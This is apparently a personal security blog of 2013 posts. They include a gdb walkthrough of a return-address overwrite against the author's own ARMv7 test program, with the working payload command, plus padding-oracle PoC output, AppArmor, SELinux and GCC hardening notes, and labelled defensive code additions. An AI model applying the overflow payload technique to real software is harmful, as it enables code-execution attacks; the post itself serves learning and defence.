Thursday, November 21, 2013

Hello, stack buffer overflow on Debian ARMv7

I haven't made my hands *dirty* for a long time, since I stopped at io-wargame lvl11. As we all know, ARM architectures are becoming sec guys' daily bread. I think it's time to begin my journey to explore the diff between ARMv7 and x86/x64. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7 (armhf) distro. After the installation, you probably want to configure a NAT network between the host and the qemu guest. Or just use my network config.

Figuring out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....

shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x00008448 <+0>:    push    {r7, lr}
   0x0000844a <+2>:    sub    sp, #8
   0x0000844c <+4>:    add    r7, sp, #0
   0x0000844e <+6>:    str    r0, [r7, #4]
   0x00008450 <+8>:    str    r1, [r7, #0]
   0x00008452 <+10>:    movw    r3, #34040    ; 0x84f8
   0x00008456 <+14>:    movt    r3, #0
   0x0000845a <+18>:    mov    r0, r3
   0x0000845c <+20>:    movw    r1, #33797    ; 0x8405
   0x00008460 <+24>:    movt    r1, #0
   0x00008464 <+28>:    movw    r2, #33845    ; 0x8435
   0x00008468 <+32>:    movt    r2, #0
   0x0000846c <+36>:    blx    0x8340
   0x00008470 <+40>:    ldr    r3, [r7, #0]
   0x00008472 <+42>:    add.w    r3, r3, #4
   0x00008476 <+46>:    ldr    r3, [r3, #0]
   0x00008478 <+48>:    mov    r0, r3
   0x0000847a <+50>:    bl    0x8404
   0x0000847e <+54>:    mov.w    r3, #0    ==> 0x0000847e should be the return address of test()
   0x00008482 <+58>:    mov    r0, r3
   0x00008484 <+60>:    add.w    r7, r7, #8
   0x00008488 <+64>:    mov    sp, r7
   0x0000848a <+66>:    pop    {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
   0x00008434 <+0>:    push    {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
   0x00008436 <+2>:    add    r7, sp, #0
   0x00008438 <+4>:    movw    r0, #34024    ; 0x84e8
   0x0000843c <+8>:    movt    r0, #0
   0x00008440 <+12>:    blx    0x8358
   0x00008444 <+16>:    pop    {r7, pc}
End of assembler dump.

Let's check the memory layout:

(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11      strcpy(buf, input);
(gdb) n
12      printf("%s \n", buf);
(gdb)
AAAABBBB
13    }
(gdb) x/12x $sp
0x7efff658:    0x00000000    0x7efff919    0x000084f8    0x41414141
0x7efff668:    0x42424242    0x00008400    0x7efff678    0x0000847f==> ret addr of test()
0x7efff678:    0x7efff7d4    0x00000002    0x00000000    0x76f12cfb

So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]

Why the hell did the addr 0x0000847e we saw above become 0x0000847f? Weird... Anyone know what happened?

OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A' , "4\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�

Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17      printf("being hacked\n");
(gdb) n

Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.

Did you see this? +1 to fuck_me()'s addr, plz.....

(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff90f 'A' , "5\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked

Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13    }

It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
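As an added example (not code from the post or from the victim program shown above), here is the shape of the defect in test() beside a bounded replacement. strcpy() copies until it meets a NUL, so an argument longer than the buffer keeps writing into whatever follows buf on the stack, which in the dump above is the saved r7 and the return address pushed by "push {r7, lr}"; the fix is to measure the input against the buffer before copying and refuse anything that does not fit. The 16-byte buffer size is the one the post gives; overrun_bytes() and copy_bounded() are names chosen here. One caveat worth knowing when reading the addresses in the post: on ARM, bit 0 of a branch target selects Thumb state, so a pointer to a Thumb function (0x8435 for fuck_me) is its disassembly address plus one, and returning to the even address makes the core decode the Thumb bytes as ARM instructions, which is the SIGILL above.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_LEN 16   /* the buffer size the post gives for test()'s buf */

/* The vulnerable shape, as in the post's test(): strcpy() stops at the
 * input's NUL, not at the end of buf, so a long argument overwrites the
 * saved r7 and the return address that follow buf on the stack.
 * Shown for contrast only; never call this on untrusted input. */
void copy_unbounded(char *buf, const char *input)
{
    strcpy(buf, input);
}

/* How many bytes a strcpy() into a buf_len-byte buffer would write past its
 * end for this input, counting the terminating NUL; 0 means the input fits. */
size_t overrun_bytes(const char *input, size_t buf_len)
{
    size_t needed = strlen(input) + 1;
    return needed > buf_len ? needed - buf_len : 0;
}

/* Hardened replacement: reject input that does not fit (rather than silently
 * truncating it) and never scan the input further than buf_len bytes.
 * Returns 0 on success, -1 if rejected; buf is left untouched on rejection. */
int copy_bounded(char *buf, size_t buf_len, const char *input)
{
    size_t n = 0;
    while (n < buf_len && input[n] != '\0')   /* bounded length scan */
        n++;
    if (n == buf_len)                          /* n + 1 bytes would not fit */
        return -1;
    memcpy(buf, input, n + 1);                 /* copies the NUL too */
    return 0;
}

int main(int argc, char **argv)
{
    char buf[BUF_LEN];
    /* constructed default input, same as the post's first run */
    const char *input = argc > 1 ? argv[1] : "AAAABBBB";

    if (copy_bounded(buf, sizeof buf, input) != 0) {
        fprintf(stderr, "rejected: input would overrun buf by %zu byte(s)\n",
                overrun_bytes(input, sizeof buf));
        return 1;
    }
    printf("%s \n", buf);
    return 0;
}
```

Run it with the post's payload (16 filler bytes plus two address bytes) and it is rejected with an overrun of 3 bytes, the two address bytes and the NUL that strcpy() would have written over the return address.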

===========================

I guess exploitation on ARM would be much different from x86. I've heard that ret2libc won't work on ARM. That's really interesting and worth figuring out. Obviously, this Phrack paper and some manuals should be added to my must-read list.

Wednesday, October 23, 2013

Say "hello nftables" on Debian 7 GNU/Linux

Nftables is the 4th generation packet filter engine for the linux kernel and it will be merged into kernel 3.13. I haven't played with netfilter for a while. When I saw Nftables a couple of days ago, I thought there was something (itches?) I needed to scratch;-) Let's try to say "Hi" to nftables.

OS: Debian 7 GNU/Linux. Grab the small version of iso here.

After the installation, some packages need to be installed as well:
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package

Firstly, you need to compile two libraries: libmnl and libnftables
git clone git://git.netfilter.org/libmnl
cd libmnl/
./autogen.sh
./configure
make
sudo make install
sudo ldconfig

git clone git://git.netfilter.org/libnftables
cd libnftables/
./autogen.sh
./configure --with-json-parsing --with-xml-parsing
make
sudo make install
sudo ldconfig

Then, compile/install the userspace tool (nft):

git clone git://git.netfilter.org/nftables
cd nftables
./autogen.sh
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes  ./configure
make
sudo make install
sudo ldconfig

Well, because linux-3.13 is not released yet, we need to grab the source code from the nftables dev tree:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux
cp /boot/config-3.2.0-4-686-pae .config
make menuconfig (select these NF_TABLES options)
make -j 3 deb-pkg
cd ../
sudo dpkg -i *.deb

Reboot your machine. Let's try some policies. Thanks to the author, whoever wrote this HOWTO. Nftables policy seems easy to write. But I'm still not used to the new style, since I don't even know how to delete a table. It always says the device is BUSY or something like that. WTH~ I checked the commits; it should be a feature though. I think a policy converter tool between iptables and nftables is necessary. Otherwise, it'd be a barrier to those old school iptables users/admins/developers.
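Since the post stops before showing any policy, here is an added example (not from the post and not an nftables project file) of a minimal host firewall in nft's own syntax. It is assumed to be saved as filter.nft and loaded with nft -f filter.nft; the table and chain names are choices made here, and the syntax is that of current nft, which the 2013 dev tree may differ from in small details.

```nft
# Added example, not from the post: a whitelist-style input policy.
# Assumed usage: nft -f filter.nft
table ip filter {
    chain input {
        type filter hook input priority 0;

        ct state established,related accept   # replies to our own connections
        iif lo accept                         # loopback
        ip protocol icmp accept
        tcp dport 22 accept                   # ssh; list further ports explicitly
        drop                                  # everything else
    }
}
```

To take it down again, empty the table before deleting it: nft flush chain ip filter input, then nft delete chain ip filter input, then nft delete table ip filter. The "busy" error the post runs into is the kernel of that dev tree refusing to delete a table that still holds chains (EBUSY); newer kernels remove the contents for you, but on that tree the order above is what works.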

Thursday, October 17, 2013

RTL-SDR version of "Hello World"

Telco sec is always a fascinating field I want to get involved with. Why? Because those old school Phrack guys have been playing with both computer sec and telco sec. I missed the golden age of Phrack, and that bothered me for a while. It won't stop me from diving into any field I want now. If what makes you tick is only profit (money?), come on, you probably aren't qualified to mention the term "underground spirit";-)

About 1 month ago, a friend (can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I might have an interest in it. Of course I have. But...well, there's always a fucking "but", isn't there?...a femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker (can't list his/her name either-_-) mentioned that there are cheap devices I could buy for learning telco stuff: RTL-SDR. Everything you need to know is already on this website. I bought a tuner, antenna, freq counter, SMA-MCX converter, etc... then I was catching the shit in the air. FM at first, then MODE-S transmissions and GSM sniffing. What I have learned/done in the past two weeks really shocked my mind and definitely activated a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and the kernel is already a burden that's hard to carry on. Hope I can make it this time............. I really appreciate those who were/are contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.

Freq counter; it probably could detect IR-based controllers
Catching the shit in the air (not the wire)
Support EFF....

Saturday, September 28, 2013

Syscan Beijing 2013 slides

I've been to 5 conferences (KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in the past months. The 1st four confs sucked. But Syscan brought us very high quality. Don't get me wrong. Some people think those 4 conferences are good, because they are websec guys or windows guys. As a GNU/Linux sec guy, those conferences were drugging me to sleep;-) So, I'll only bullshit a little bit about Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people think there are many technique elements in the process of exploiting, and each one of them is difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation was about ROP gadgets. I don't know much about this field. I only used some open source ROP gadget finders once or twice. Anyway, Nguyen's talk also blew my mind on the 1st day of the conference, because his approach is llvm compiler based (dude, you are using formal logic to deal with sec shit! Fuc*ing awesome). Plz take a look at his slide. There were other great presentations. I'll leave the slide download link at the end.

Another funny story happened near the end of Jonathan's presentation. A guy asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are the grsecurity guys: they invented the concept of ASLR, and more....btw, take a look at how grsec deals with the stack canary in the hardened kernel;-)

I've packed all the slides into one tar.bz file.

Can you fucking imagine that the conference organizers (I wouldn't name you motherfuckers) brought these girls (sexy? I don't think so) there? I don't care about girls at a conference. As our type of guys, we'd go out to the club/bar after the conference. Unfortunately, I've already got married, which means the "fuck around" part doesn't belong to me;-)



Sunday, July 28, 2013

Trip of Thessaloniki for osc 2013

As many people mentioned, openSUSE conference 2013 was held from July 18 to July 22 in Thessaloniki, Greece. After 20hrs in the air and waiting in the airport (for transfers), I arrived in the city of Thessaloniki at about 3:00 PM on July 17. Then I went to the seaside by bus No.78. It was a really nice view there. Then I took a taxi to the hotel for another 12 hrs of sleep;-) I visited the White Tower and Aristotle Square. The great philosopher Aristotle was born in a place near the city of Thessaloniki. I thought Aristotle had visited the city but I haven't found the related information yet.

It was really nice to be there. Local people are so relaxed. Much more relaxed than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. Some people I met in Thessaloniki, we all love beer/sec/gaming/System of a Down/Rammstein/Nirvana/etc....even the background music of the main conference room was Nirvana songs. Man, can you believe it? I never saw that happen in China. These guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned no less from them in a few days.

This trip made me feel like I was on my way back home. Most people don't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.

-------------------------------------------------------------------------
 - I love punk rock and metal, am I wrong?
 - I love Philosophy/Theology/History, am I fucking wrong?
 - I love Tri-A title computer/video games, am I fucking wrong?
 - I don't care how much money I earn (I can still feed my family, you piece of shit-_-), am I wrong?
 - I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?
 ------------------------------------------------------------------------

I don't think I'm a weirdo. But most Chinese people I met in BJ just think that way. Don't get me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are a minority....Green Day is always supporting us: "I wanna be the minority... I don't need your authority...Down with the moral majority"...aha, I really love this song;-)

btw: The food in the city of Thessaloniki is really awesome, especially the seafood. And I, as a newbie, gave a presentation "Introduction to GNU/Linux hardening" at osc 2013.

Nice view, ha?

old good port


White Tower, or maybe we should call it "The Greece Tower"



I haven't found the ASSOS yet;-)
Little dude, you got a gun?
Olympic Museum, this is the place for osc2013
Gecko money is not a bad idea, is it?
Sometimes, RMS is wrong. Free speech is as free beer;-)
July 23, people are gone
I love this shit!@#$%^&*()
Istanbul - on the map of Civilization IV, ring a bell?
Awesome architecture...........

Wednesday, July 03, 2013

review the book "Profiling Hackers"

I've been reading the book Profiling Hackers recently. For now, I've only looked through a little bit of it. There are some topics that are very interesting, so I'd like to share them with you guys.
 
This book lists these questions:

---------------------------------------------------
Why am I interested in hacking?
What are my objectives?
What am I trying to obtain through hacking?
What do I want to become?
What do I want people to think of me?
How do I want to be remembered, and what for?
---------------------------------------------------

It's a matter of the motivation for hacking. IMHO, hackers are always hacking for fun and yes, indeed (we can't deny it, right-_-)..for profit. Aleph One's paper title was sort of a philosophical metaphor;-) Both motivations (fun/profit) are very important, because if a security guy only cares about one of them, it would be devastating for a person's (hacker's) life.
 
* Fun? To some hackers, hacking is part of their life. They can't live without hacking. They are happy with joy while writing exploits...
 
* Profit? Money, of course. White hats work for commercial companies. Black hats?
 
* Both white and black hats are able to sell exploits or get involved with underground business
 
 
But....as a hacker, if we:
Only have the "fun" part: too spiritual, dude... and it's hard to make the people (industry) believe you in real-life sec engineering.... Well, if security is not your day job, that's another story;-)

Only have the "profit" part:
even worse, just like a lot of security conference runners (whores-_-) who only have one slide/topic and goof around the world. They are a bunch of walking dead.

As a real hacker, I do believe that he/she would have both of them.

And the book also talks about the common traits of hackers, regardless of age, profession, ethnicity, etc:
 
------------------------------------------------------------------------
* They usually have an above average IQ and great technical and problem-solving skills.
* They are brilliant adolescents, suffocated by an inadequate school system and by ill-prepared or poorly equipped teachers.
* They generally come from problem families.
* They rebel against all symbols or expressions of authority.
------------------------------------------------------------------------

It's true. Except the 3rd one is a little bit vague. How to define "problem families"? Divorce? Or others? If it means that a family lacks proper (btw: wth is *proper*) education/homeschooling for the kid, well...it'd mean a huge number of families.

I haven't finished reading. It's a really great book. I never found a book which gives a sociological way to discuss hackers. The Hacker Ethic and the Spirit of the Information Age did some aspects of the work, but Pekka was more focused on the generic hacker (not only in the computer/sec field).

Wednesday, May 22, 2013

How to harden your own program in GNU/Linux

Platform: OpenSUSE 12.3

AppArmor is an implementation of confinement technology. It could help you prevent unknown attacks like 0-day vulnerabilities. In openSUSE/Ubuntu, it's very easy to install. In the case of openSUSE 12.3, typing "yast2" in the terminal or using the GUI software management can install AppArmor. Once you've installed AppArmor, you need to make a profile for the program you want to be hardened.

Firstly, please download the example files here. Then compile the program:

shawn@linux-sk8j:~> gcc apparmor_test.c

Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

.........................................
.........................................
.........................................

Finished generating profile for /home/shawn/a.out.
 -----------------------------------------------------------

Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few lines into it like this:

# The <...> include targets were stripped by the blog's HTML; these are the
# two that genprof writes by default.
#include <tunables/global>

/home/shawn/a.out {
  #include <abstractions/base>

  /home/shawn/a.out mr,
  /home/shawn/hello r,
  /home/shawn/world w,
  network stream,
}

Because AppArmor uses a whitelist-like policy by default, the above example means: this program (a.out) is only allowed read permission on the file /home/shawn/hello, write permission on the file /home/shawn/world, and stream (tcp) sockets. If this program has a stack-based buffer overflow issue, the attacker might want to spawn a shell by exploiting it. In this case, that's not gonna happen, since the profile grants no execute permission on anything. For further reading about AppArmor profiles, you might be interested in this article. Other similar implementations like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.

When you've done the confinement hardening, there are a lot of mitigation technologies you should consider. They're much easier to use. Please keep this in mind: these defensive technologies are what we call "mitigation", which means skilled hackers or attackers have the ability to bypass them. It's only a matter of time.

GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions are protected
-fstack-protector-all, protects every function in your program

Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.

Heap (malloc() corruption check):
on by default since glibc 2.5. Please use the latest version of glibc.

Position-Independent Executable:
-fPIE -pie, takes advantage of the ASLR provided by the kernel. Remember to turn on your ASLR (kernel.randomize_va_space=2):


Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth reading.

GOT memory corruption attack hardening of ELF binaries:
-Wl,-z,relro, Partial RELRO
-Wl,-z,relro -Wl,-z,now, Full RELRO

Bypass method, please check The Art Of ELF: Analysis and Exploitations

String vulnerability mitigation:
-D_FORTIFY_SOURCE=2 (needs -O1 or higher), mitigates format string vulns

Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.

Non-executable stack:
-Wl,-z,noexecstack

Well, there are a lot of ways to bypass it.
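As an added example (not from the post), a Makefile that turns all of the above flags on together and checks the result with readelf; hardened.c is an assumed source file name and the target names are choices made here.

```makefile
# Added example, not from the post: build with every mitigation listed
# above, then verify the binary actually carries them.
CC      ?= gcc
CFLAGS  += -O2 -fstack-protector-all -D_FORTIFY_SOURCE=2 -fPIE
LDFLAGS += -pie -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack

hardened: hardened.c
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $<

# GNU_RELRO and a GNU_STACK segment without the E flag in the program
# headers, BIND_NOW in the dynamic section, ET_DYN (shared object) for PIE,
# and a reference to __stack_chk_fail for the canary.
check: hardened
	readelf -l $< | grep -E -A1 'GNU_RELRO|GNU_STACK'
	readelf -d $< | grep -E 'BIND_NOW|FLAGS'
	readelf -h $< | grep 'Type:'
	nm $< | grep __stack_chk_fail

.PHONY: check
```

Note that _FORTIFY_SOURCE does nothing without optimization, which is why -O2 sits in CFLAGS, and that -pie without -fPIE on the objects fails to link on most toolchains, so the two belong together.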

I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation techs and a lot of bypass techs. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)

btw: You don't need to worry about the performance hit when you turn on these mitigation techs, except -fstack-protector-all. That's it!

May L0rd's hacking spirit guide us!!!

Friday, April 26, 2013

Padding Oracle Attack PoC in C

I'm a newbie in the crypto field. *Unfortunately*, I need to deal with some open source security stuff (openssl and gnutls) in my day job. Yes, don't be so sad for me;-) I can handle it so far. I need to know more about crypto. The best way to do it is writing xxx-attack PoCs. Then I heard of Lucky Thirteen. Backporting those patches from upstream drove me crazy. Dude, you know~ 13 openssl upstream commits (more than 1,700 lines modified) were only for fixing one security issue, called Lucky Thirteen, which was disclosed in Feb 2013. It was my honor to do this shitload of work with a very very low salary;-) After I finished it, a very serious question came to my mind: what if another ten shitloads of work pop up in the future but with no help from the upstream community? Well...I have to eat the rocket with my own hands. F0r preparing to handle such a situation, I need to know the details of the attack. That's why I wrote the padding oracle attack PoC (Download here).

I googled "padding oracle attack". I found 3 guys who wrote their own padding oracle attack PoC/tools in 3 different languages: perl, ruby and python. I looked at their code and articles. These guys are awesome!

Brian Holyfield (Perl guy) wrote this very good article, and more importantly it's easy to understand:
 
http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

Daoge (python one) is a Chinese hacker who is good at web security:
http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6

Ron Bowes (Ruby guy) gave us a great presentation at Shmoocon 2013. I really thank him for his practical advice. He wrote two articles about the padding oracle attack. The 1st one introduces the principle and the 2nd gives a great example.

http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth

http://www.skullsecurity.org/blog/2013/a-padding-oracle-example


Well, I'm a kind of old school guy. I decided to write it in C (not as old as asm). This example is simple:

shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc 
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000
----> rld
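The PoC output above ends on a last block of "rld" followed by five 0x05 bytes, i.e. PKCS#5 padding on an 8-byte block cipher. The oracle the attack relies on is the receiver telling the sender, through a distinct error code or through timing, whether that padding checked out. As an added example (not the PoC's code and not OpenSSL's), here is the padding logic with a leaky check beside one that does data-independent work and reports a single generic failure; the function names and the BLOCK constant are choices made here.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 8-byte blocks, as the PoC's last block "rld" + 5 x 0x05 implies. */
#define BLOCK 8

/* PKCS#5/#7 padding: append n bytes of value n, 1 <= n <= BLOCK.
 * out needs room for len + BLOCK bytes; returns the padded length. */
size_t pkcs7_pad(const uint8_t *in, size_t len, uint8_t *out)
{
    size_t n = BLOCK - (len % BLOCK);   /* always 1..BLOCK, never 0 */
    memcpy(out, in, len);
    memset(out + len, (int)n, n);
    return len + n;
}

/* The leaky shape: distinct error codes, and an early exit as soon as one
 * pad byte mismatches, so both the code and the time taken reveal how far
 * the check got. That is exactly what a padding oracle attack measures. */
int unpad_leaky(const uint8_t *buf, size_t len, size_t *out_len)
{
    if (len == 0 || len % BLOCK != 0)
        return -2;                          /* distinguishable: length error */
    size_t n = buf[len - 1];
    if (n == 0 || n > BLOCK)
        return -1;                          /* distinguishable: bad pad value */
    for (size_t i = len - n; i < len; i++)
        if (buf[i] != n)
            return -1;                      /* early exit: timing leak */
    *out_len = len - n;
    return 0;
}

/* Uniform shape: always examine every byte of the last block, never branch
 * on pad contents inside the loop, and collapse every failure into one code. */
int unpad_uniform(const uint8_t *buf, size_t len, size_t *out_len)
{
    if (len == 0 || len % BLOCK != 0)
        return -1;
    size_t n = buf[len - 1];
    /* 1 iff 1 <= n <= BLOCK; n == 0 wraps to SIZE_MAX and fails the compare */
    unsigned good = (unsigned)(n - 1 < (size_t)BLOCK);
    for (size_t i = 0; i < BLOCK; i++) {
        unsigned in_pad   = (unsigned)(i < n);                     /* byte i from the end is pad? */
        unsigned mismatch = (unsigned)(buf[len - 1 - i] != (uint8_t)n);
        good &= (in_pad & mismatch) ^ 1u;   /* clear on a mismatch inside the pad */
    }
    if (!good)
        return -1;                          /* one generic result for all failures */
    *out_len = len - n;
    return 0;
}

int main(void)
{
    uint8_t padded[16];
    size_t out_len = 0;
    /* constructed input: the PoC's plaintext */
    size_t padded_len = pkcs7_pad((const uint8_t *)"Hello World", 11, padded);
    printf("padded to %zu bytes, last byte 0x%02x\n", padded_len, padded[padded_len - 1]);
    printf("uniform unpad: %d (plaintext length %zu)\n",
           unpad_uniform(padded, padded_len, &out_len), out_len);
    padded[padded_len - 2] ^= 1;            /* corrupt one pad byte */
    printf("after corruption: leaky=%d uniform=%d\n",
           unpad_leaky(padded, padded_len, &out_len),
           unpad_uniform(padded, padded_len, &out_len));
    return 0;
}
```

Uniform rejection on its own is not the whole fix: in a MAC-then-encrypt design like TLS's, the MAC computation that follows unpadding still takes a data-dependent amount of time, which is the channel Lucky Thirteen uses, so the robust answer is to authenticate the ciphertext before it is decrypted at all (encrypt-then-MAC or an AEAD mode), so that a forged record never reaches the padding check.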
 
btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field...

Wednesday, April 17, 2013

How to enable SELinux in SLES 11 SP2

I've been playing with SELinux for a few days. Once you decide to hack on SELinux, a very long hacking journey begins. The 1st shit you need to do is enable SELinux before you dive into the details. Yes, you may already know these great resources could help your SELinux hacking journey:

1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition

The SELinux kernel module is already compiled into SUSE Linux Enterprise Server 11 SP2 but without any specific policies. OK then, I've bullshitted a lot, haven't I? Please allow me to bullshit a lot more;-)

Firstly, make sure SLES 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue

Welcome to SUSE Linux Enterprise Server 11 SP2  (i586) - Kernel \r (\l).
-------------------------------------------------------------------------------- 

Install the packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------


Type "yast2 bootloader" on the cmdline and add:
-------------------------------------------------------------------------------- 
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
In the GRUB bootloader, the above 3 options are related to SELinux:
 * security=selinux, tells the kernel to use SELinux and not AppArmor
 * selinux=1, switches on SELinux
 * enforcing=0, puts SELinux in permissive mode (only logging)


Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------

Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------

Add selinux to the existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------

Set the restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------

Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:

shawn-fortress:~ # sestatus
SELinux status:                 enabled
SELinuxfs mount:                /selinux
Current mode:                   permissive
Mode from config file:          permissive
Policy version:                 26
Policy from config file:        refpolicy-standard

See, it's working!

Thanks to Thomas Biege, who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me understand the config of SELinux in the big picture.

May L0rd's hacking spirit guide us!

Monday, April 01, 2013

Vuln assessment for PALADIN forensic tools free version

I went to the China Mac Forensic Conference last week. This was the 1st time I attended a security con about forensics. Some security guys gave us a few free talks and it was all about forensics. In the forensics field, the only stuff I know is Lynis, which was written by Michael Boelen. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little bored. But what else can I blame? This conference is called Mac-Forensic*. Fortunately, I found something very interesting in the afternoon. A company named SUMURI provides a forensic solution based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up on the scene. Well, I was fuc* excited, because I got tens of shitloads of information about Mac/iOS that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks in the PALADIN GNU/Linux distro. I've already notified them. Hope they could spend more time on sec stuff.

OK. When PALADIN boots up, you can see the ubuntu-like (Unity?) GUI:



PALADIN provides a lot of open source forensic tools:

In the free version, the only closed tool is "PALADIN Toolbox", which can be found on the Desktop; the binary file is located in /usr/bin/toolbox. This binary uses many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" on the scene. His answer was pretty sure that the toolbox doesn't violate any free/open source licenses:

Then, I took a few mins to investigate the binary. Firstly, the entry address:

And it doesn't have any anti-debugging features (my examples) in it. If your asset is a closed-source binary, you should do anti-debug. A skilled reverse engineer is able to find the security issues by reversing the binary in a very *short* time:

ASLR is turned on. "2" is very good, which means the kernel does the randomization for stack and heap separately. AFAIK, the issue is that ASLR only works for the executable itself with PIE.

The Lucky Thirteen attack is a big issue recently. The current openssl version is affected.

Well, this is it. I'd just finished the investigation when a guy told me it was time for a break. I'm very happy to see a company like SUMURI bring GNU/Linux into the forensic field.

